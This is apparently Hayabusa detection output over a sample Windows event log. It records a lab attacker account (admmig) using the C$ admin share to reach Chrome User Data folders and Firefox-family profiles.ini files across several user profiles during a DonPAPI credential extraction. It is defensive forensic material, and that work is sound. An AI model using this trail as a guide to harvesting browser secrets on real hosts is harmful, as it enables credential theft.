0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.899 